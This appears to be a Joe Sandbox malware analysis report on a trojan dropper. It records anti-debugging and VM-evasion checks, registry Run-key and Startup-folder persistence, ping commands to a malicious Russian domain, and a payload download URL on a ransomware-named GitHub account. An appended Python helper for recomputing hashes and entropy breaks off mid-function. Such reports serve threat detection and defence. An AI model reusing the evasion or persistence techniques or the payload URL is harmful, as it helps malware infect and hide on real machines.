Source: Y5kEUsYDFr.exe, 00000000.00000002.4145231704.0000017ACB886000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: black.exe, 00000007.00000002.4147454579.0000000002671000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VBoxService
Source: black.exe, 00000001.00000002.4145831872.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, black.exe, 00000007.00000002.4145663567.00000000008E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\black.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\black.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | System information queried: KernelDebuggerInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Roaming\black.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\black.exe | Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Roaming\black.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\black.exe | Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9F3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6CA9F3170
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CAA00D20 GetProcessHeap,0_2_00007FF6CAA00D20
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9F3354 SetUnhandledExceptionFilter,0_2_00007FF6CA9F3354
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9F2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6CA9F2510
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9F3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6CA9F3170
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9F76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6CA9F76D8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9EB190 SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6CA9EB190
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping vastgm.ru
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping vastgm.ru
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping vastgm.ru
Source: C:\Users\user\AppData\Roaming\black.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping vastgm.ru
Source: C:\Users\user\AppData\Roaming\black.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping vastgm.ru
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping vastgm.ru
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping vastgm.ru
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping vastgm.ru
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9E9D90 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,CopySid,SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateDirectoryW,LocalFree,0_2_00007FF6CA9E9D90
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9DDC70 cpuid 0_2_00007FF6CA9DDC70
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF6CA9EA2CC
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\black.exe | Queries volume information: C:\Users\user\AppData\Roaming\black.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\black.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\black.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\black.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\black.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9F0754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6CA9F0754
Source: C:\Users\user\Desktop\Y5kEUsYDFr.exe | Code function: 0_2_00007FF6CA9D4EB0 GetVersionExW,0_2_00007FF6CA9D4EB0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (a number in front of a technique is the report's count of matching signatures for this sample; cells without a number are the matrix's standard entries):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 121 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | 3 Obfuscated Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 11 Process Injection | 2 Software Packing | Security Account Manager | 35 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 121 Registry Run Keys / Startup Folder | 1 Timestomp | NTDS | 1 Query Registry | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 341 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 251 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 251 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | 1 Remote System Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph (ID: 1571211, Sample: Y5kEUsYDFr.exe, Start date: 09/12/2024, Architecture: WINDOWS, Score: 100). The rendered graph is not reproduced here; the facts recoverable from it:

  • Process tree: Y5kEUsYDFr.exe drops C:\Users\user\AppData\Local\...\black.exe (PE32) and starts it; black.exe drops C:\Users\user\AppData\Roaming\black.exe and C:\Users\user\AppData\Roaming\...\black.exe (PE32) and starts cmd.exe, which starts conhost.exe and PING.EXE; Acrobat.exe starts AcroCEF.exe.
  • Signatures shown on the graph: Antivirus detection for dropped file, Multi AV Scanner detection for dropped file, Multi AV Scanner detection for submitted file, Query firmware table information (likely to detect VMs), Hides threads from debuggers, Uses ping.exe to check the status of other devices and networks, plus 4 other signatures.
  • Network: github.com 20.233.83.145, port 443 (MICROSOFT-CORP-MSN-AS-BLOCKUS, United States), contacted by black.exe; x1.i.lencr.org; 69.192.108.223, port 443 (AKAMAI-ASUS, United States), contacted by AcroCEF.exe; vastgm.ru 185.178.208.190 (DDOS-GUARDRU, Russian Federation), contacted by PING.EXE.

Submitted file:

Source | Detection | Scanner | Label
Y5kEUsYDFr.exe | 47% | ReversingLabs | Win32.Exploit.Generic
Y5kEUsYDFr.exe | 61% | Virustotal |
Y5kEUsYDFr.exe | 100% | Joe Sandbox ML |
Dropped files:

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe | 100% | Avira | HEUR/AGEN.1310014
C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | 100% | Avira | HEUR/AGEN.1310014
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe | 100% | Avira | HEUR/AGEN.1310014
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\RarSFX0\black.exe | 34% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe | 34% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Roaming\black.exe | 34% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
No Antivirus matches
Domains:

Source | Detection | Scanner | Label
vastgm.ru | 0% | Virustotal |
No Antivirus matches
Contacted domains:

Name | IP | Active | Malicious | Antivirus Detection | Reputation
github.com | 20.233.83.145 | true | false | | high
vastgm.ru | 185.178.208.190 | true | true | | unknown
x1.i.lencr.org | unknown | unknown | false | | high
Contacted URLs:

Name | Malicious | Antivirus Detection | Reputation
http://github.com/keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe | false | | high
https://github.com/keygroup777-Ransomware/DOWNLOADER/raw/refs/heads/main/telefron.exe | false | | high

URLs from memory and binaries:

Name | Source | Malicious | Antivirus Detection | Reputation
http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D | 0.23.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | black.exe, 00000001.00000002.4147614822.0000000002521000.00000004.00000800.00020000.00000000.sdmp, black.exe, 00000007.00000002.4147454579.0000000002671000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com | black.exe, 00000001.00000002.4147614822.0000000002521000.00000004.00000800.00020000.00000000.sdmp | false | | high
Contacted IPs:

IP | Domain | Country | ASN | ASN Name | Malicious
69.192.108.223 | unknown | United States | 16625 | AKAMAI-ASUS | false
20.233.83.145 | github.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
185.178.208.190 | vastgm.ru | Russian Federation | 57724 | DDOS-GUARDRU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1571211
Start date and time: 2024-12-09 07:02:47 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 44s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 44
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Y5kEUsYDFr.exe (renamed because the original name is a hash value)
Original Sample Name: ec773998b0078cc58100fdb4d27dc3f4.exe
Detection: MAL
Classification: mal100.troj.adwa.evad.winEXE@42/41@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 206
• Number of non-executed functions: 110
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 23.32.238.137, 23.32.238.128, 23.32.238.98, 23.32.238.106, 23.32.238.138, 23.32.238.113, 23.32.238.107, 23.32.238.123, 23.32.238.129, 162.159.61.3, 172.64.41.3, 23.32.238.155, 23.32.238.162, 2.19.198.49, 23.32.238.161, 23.32.238.131, 23.32.238.146, 2.19.198.43, 2.20.40.170, 23.218.208.137, 23.195.39.65, 50.16.47.176, 18.213.11.84, 34.237.241.83, 54.224.241.105, 23.32.238.122, 23.32.238.147, 23.32.238.153, 23.32.238.145, 23.32.238.115, 23.32.238.154, 2.16.188.171, 23.32.238.97, 23.32.238.112, 23.32.238.114, 23.32.238.99, 2.19.198.57, 2.19.198.41, 2.19.198.50, 2.19.198.58, 23.32.238.163, 2.19.198.40, 2.19.198.72, 23.32.238.160, 23.32.238.90, 23.32.238.96, 23.32.238.130, 2.19.198.73
                • Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, e4578.dscg.akamaiedge.net, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, e4578.dscb.akamaiedge.net, ctldl.windowsupdate.com, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, crl.root-x1.letsencrypt.org.edgekey.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:04:16 | API Interceptor | 3912x Sleep call for process: black.exe modified
01:05:11 | API Interceptor | 1x Sleep call for process: AcroCEF.exe modified
06:03:42 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run black C:\Users\user\AppData\Roaming\black.exe
06:03:51 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run black C:\Users\user\AppData\Roaming\black.exe
06:04:18 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\black.exe
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                69.192.108.223CMB Monaco Signatures Consent Docs#299229(Revised).pdfGet hashmaliciousUnknownBrowse
                  Quarantined Messages.zipGet hashmaliciousUnknownBrowse
                    Quotation.xlsGet hashmaliciousUnknownBrowse
                      original (1).emlGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                        https://qcg-media.s3.amazonaws.com/media/uploads/560701/2023/09/20230928_651070_htmlCode18.pdfGet hashmaliciousUnknownBrowse
                          20.233.83.145qe4efGS22G.exeGet hashmaliciousUnknownBrowse
                            qe4efGS22G.exeGet hashmaliciousUnknownBrowse
                              QlyOUFGIFB.exeGet hashmaliciousMicroClipBrowse
                                https://github.com/bambulab/BambuStudio/releases/download/v01.10.01.50/Bambu_Studio_win_public-v01.10.01.50-20241115162711.exeGet hashmaliciousUnknownBrowse
                                  Cooperative Agreement0000800380.docx.exeGet hashmaliciousBabadeda, Blank GrabberBrowse
                                    1.exeGet hashmaliciousHavoc, RUSTDESKBrowse
                                      Ttok18.exeGet hashmaliciousVidarBrowse
                                        https://github.com/kernelwernel/VMAware/releases/download/v1.9/vmaware64.exeGet hashmaliciousUnknownBrowse
                                          SplpM1fFkV.exeGet hashmaliciousUnknownBrowse
                                            TikTokDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                              185.178.208.1909oUx9PzdSA.exeGet hashmaliciousCyberduck Djvu SmokeLoader VidarBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                github.comQlyOUFGIFB.exeGet hashmaliciousMicroClipBrowse
                                                • 20.233.83.146
                                                Cooperative Agreement0000800380.docx.exeGet hashmaliciousBabadeda, Blank GrabberBrowse
                                                • 20.233.83.145
                                                1.exeGet hashmaliciousHavoc, RUSTDESKBrowse
                                                • 20.233.83.145
                                                Ttok18.exeGet hashmaliciousVidarBrowse
                                                • 20.233.83.145
                                                https://github.com/kernelwernel/VMAware/releases/download/v1.9/vmaware64.exeGet hashmaliciousUnknownBrowse
                                                • 20.233.83.145
                                                SplpM1fFkV.exeGet hashmaliciousUnknownBrowse
                                                • 20.233.83.145
                                                PO24002292.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                • 140.82.121.4
                                                TikTokDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                • 20.233.83.145
                                                TTDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                • 20.233.83.145
                                                TTDesktop18.exeGet hashmaliciousStealc, VidarBrowse
                                                • 20.233.83.145
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                DDOS-GUARDRUhttps://u.to/Ipn6IAGet hashmaliciousUnknownBrowse
                                                • 195.216.243.155
                                                https://u.to/YaL0IAGet hashmaliciousUnknownBrowse
                                                • 195.216.243.155
                                                http://cancelarpedidoaqui003.weebly.com/Get hashmaliciousUnknownBrowse
                                                • 195.216.243.218
                                                https://u.to/1czkIAGet hashmaliciousUnknownBrowse
                                                • 195.216.243.155
                                                https://u.to/xjPiIAGet hashmaliciousUnknownBrowse
                                                • 195.216.243.155
                                                https://u.to/G3PhIAGet hashmaliciousUnknownBrowse
                                                • 195.216.243.155
                                                https://u.to/UKDgIAGet hashmaliciousUnknownBrowse
                                                • 195.216.243.155
                                                https://sucursalvpinvalidar-aqui10.weebly.com/Get hashmaliciousUnknownBrowse
                                                • 195.216.243.218
                                                https://u.to/W9rXIAGet hashmaliciousUnknownBrowse
                                                • 195.216.243.155
                                                https://u.to/SpzbIAGet hashmaliciousUnknownBrowse
                                                • 195.216.243.155
                                                AKAMAI-ASUSsora.ppc.elfGet hashmaliciousMiraiBrowse
                                                • 84.53.135.142
                                                sora.mips.elfGet hashmaliciousMiraiBrowse
                                                • 104.84.160.234
                                                zZeXr4mg0S.exeGet hashmaliciousLokibotBrowse
                                                • 23.47.168.24
                                                meerkat.mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 104.116.11.255
                                                meerkat.arm5.elfGet hashmaliciousMiraiBrowse
                                                • 95.101.212.58
                                                meerkat.x86.elfGet hashmaliciousMiraiBrowse
                                                • 104.119.28.3
                                                5386.pdf.exeGet hashmaliciousUnknownBrowse
                                                • 23.195.92.153
                                                jmhgeojeri.elfGet hashmaliciousUnknownBrowse
                                                • 23.50.229.212
                                                home.m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 23.213.140.193
                                                jew.arm7.elfGet hashmaliciousMiraiBrowse
                                                • 23.33.113.246
                                                MICROSOFT-CORP-MSN-AS-BLOCKUSTRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                • 52.123.243.181
                                                6fW0GedR6j.xlsGet hashmaliciousUnknownBrowse
                                                • 13.107.246.63
                                                TRANSFERENCIA COMPROBANTES.lnkGet hashmaliciousXenoRATBrowse
                                                • 52.113.195.132
                                                Transferencia.lnkGet hashmaliciousXenoRATBrowse
                                                • 52.113.195.132
                                                jew.arm6.elfGet hashmaliciousUnknownBrowse
                                                • 23.102.19.194
                                                jew.m68k.elfGet hashmaliciousUnknownBrowse
                                                • 20.201.109.244
                                                jew.mips.elfGet hashmaliciousUnknownBrowse
                                                • 20.157.99.220
                                                jew.ppc.elfGet hashmaliciousUnknownBrowse
                                                • 20.181.37.3
                                                jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                • 159.27.209.232
                                                jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                                • 13.71.38.171
                                                 Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                 54328bd36c14bd82ddaa0c04b25ed9ad | Hesap_Hareketleri_09122024_html.exe | malicious | Snake Keylogger, VIP Keylogger | 20.233.83.145
                                                  | SIPARIS TEYIT FORMU VE PROFORMA FATURA.exe | malicious | MassLogger RAT | 20.233.83.145
                                                  | INVOICES.bat.exe | malicious | Snake Keylogger, VIP Keylogger | 20.233.83.145
                                                  | BL-100410364195.exe | malicious | MassLogger RAT | 20.233.83.145
                                                  | INQUIRY REQUEST AND PRICES_pdf.exe | malicious | GuLoader, MassLogger RAT | 20.233.83.145
                                                  | Bank Swift and SOA PRN00720031415453_pdf.exe | malicious | GuLoader, MassLogger RAT | 20.233.83.145
                                                  | RFQ Order list #2667747.exe | malicious | GuLoader, MassLogger RAT | 20.233.83.145
                                                  | Payment Details Ref#577767.exe | malicious | GuLoader, MassLogger RAT | 20.233.83.145
                                                  | IBAN Payment confirmation.exe | malicious | GuLoader, MassLogger RAT | 20.233.83.145
                                                  | DEKONTU.exe | malicious | Snake Keylogger | 20.233.83.145
                                                No context
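The dropped-file entries that follow give, for each file, Size (bytes), Entropy (8bit), an Encrypted flag, an SSDEEP fuzzy hash and the MD5/SHA1/SHA-256/SHA-512 digests. As an added example (not code from the Joe Sandbox report or from Joe Security), the Python below recomputes those fields from the raw bytes of a file recovered from the analysis machine, so that the values in the report can be checked against the artefact itself. The 7.5 bits-per-byte threshold behind the Encrypted flag is this example's own assumption; the rule Joe Sandbox uses for its Encrypted column is not documented on this page. SSDEEP is left out because it needs a module outside the standard library.

```python
"""Recompute the per-file fields shown in a Joe Sandbox 'Dropped Files' entry.

Added example; not code from the Joe Sandbox report. Covers Size (bytes),
Entropy (8bit), Encrypted, MD5, SHA1, SHA-256 and SHA-512.
"""
import hashlib
import math
from collections import Counter
from dataclasses import dataclass

# ASSUMPTION: entropy (bits per byte) at or above which this example flags a
# file as likely encrypted or compressed. This is the example's own heuristic,
# not the rule Joe Sandbox applies when it sets "Encrypted".
ENCRYPTED_ENTROPY_THRESHOLD = 7.5


@dataclass
class FileProfile:
    size: int
    entropy: float
    encrypted: bool
    md5: str
    sha1: str
    sha256: str
    sha512: str


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    total = 0.0
    for count in Counter(data).values():
        p = count / n
        total -= p * math.log2(p)
    return total


def profile_bytes(data: bytes) -> FileProfile:
    """Build the report-style profile for an in-memory file body (digests in upper-case hex, as in the report)."""
    ent = shannon_entropy(data)
    return FileProfile(
        size=len(data),
        entropy=ent,
        encrypted=ent >= ENCRYPTED_ENTROPY_THRESHOLD,
        md5=hashlib.md5(data).hexdigest().upper(),
        sha1=hashlib.sha1(data).hexdigest().upper(),
        sha256=hashlib.sha256(data).hexdigest().upper(),
        sha512=hashlib.sha512(data).hexdigest().upper(),
    )


def profile_file(path: str) -> FileProfile:
    """Profile a dropped file recovered from disk or from a sandbox export."""
    with open(path, "rb") as fh:
        return profile_bytes(fh.read())


def compare_to_report(profile: FileProfile, reported: dict) -> list:
    """Return the report labels whose values disagree with the recomputed profile.

    `reported` is keyed by the report's own labels, e.g.
    {"Size (bytes)": "475", "Entropy (8bit)": "4.967403857886107", "MD5": "B776..."}.
    Digests are compared case-insensitively, entropy to within 1e-6.
    """
    field_for_label = {
        "Size (bytes)": "size",
        "Entropy (8bit)": "entropy",
        "Encrypted": "encrypted",
        "MD5": "md5",
        "SHA1": "sha1",
        "SHA-256": "sha256",
        "SHA-512": "sha512",
    }
    mismatches = []
    for label, want in reported.items():
        got = getattr(profile, field_for_label[label])
        if label == "Size (bytes)":
            ok = got == int(want)
        elif label == "Entropy (8bit)":
            ok = abs(got - float(want)) < 1e-6
        elif label == "Encrypted":
            ok = got == (str(want).lower() == "true")
        else:
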